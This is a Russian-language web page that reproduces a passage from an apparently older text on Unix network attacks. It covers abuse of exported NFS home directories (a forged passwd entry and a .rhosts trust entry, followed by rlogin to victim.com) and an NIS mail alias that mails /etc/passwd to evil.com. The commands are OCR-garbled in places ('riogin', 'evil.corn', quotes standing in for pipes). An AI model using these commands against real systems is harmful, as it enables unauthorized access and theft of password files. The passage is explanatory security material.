Главная Случайная страница Контакты | Мы поможем в написании вашей работы! | ||
|
1 drwx--x--x 9 10001 daemon 1024 Aug 315:49 guest
evil # echo guest: х: 10001:1: временно для взлома:/: " /etc/passwd
evil # su guest
evil % echo victim.com " guest/, rhosts
evil % riogin victim.com
Welcome to victim.com!
victim %
Если бы victim.com нe экспортировал домашние каталоги пользователей, а
только каталоги с программами (скажем, /usr или /usr/local/bin), можно
было бы заменить команду "троянским" конем, который выполнял бы те же
Операции.
Распространенность NFS приводит к тому, что подобные атаки до сих пор
Являются актуальными, и, как мы увидим, они похожи на уязвимости,
Имеющиеся в Windows NT из-за наличия в ней механизма разделения каталогов.
Использование службы NIS
Активный NIS-сервер управляет почтовыми псевдонимами (aliases) для доменов
NIS. Подобно рассмотренным вариантам атак с помощью псевдонимов локальной
Почты можно было создавать почтовые псевдонимы, которые бы выполняли
Команды, когда им приходит почта. Например, рассмотрим создание псевдонима
"foo", посылавшего по почте файл паролей на evil.corn, когда на его адрес
поступало любое сообщение:
nis-master # echo 'foo: "I mail [email protected] " /etc/passwd "' "
/etc/aliases
nis-master и cd /var/yp
nis-master # make aliases
nis-master # echo test I mail -v [email protected]
Дата публикования: 2014-11-04; Прочитано: 484 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!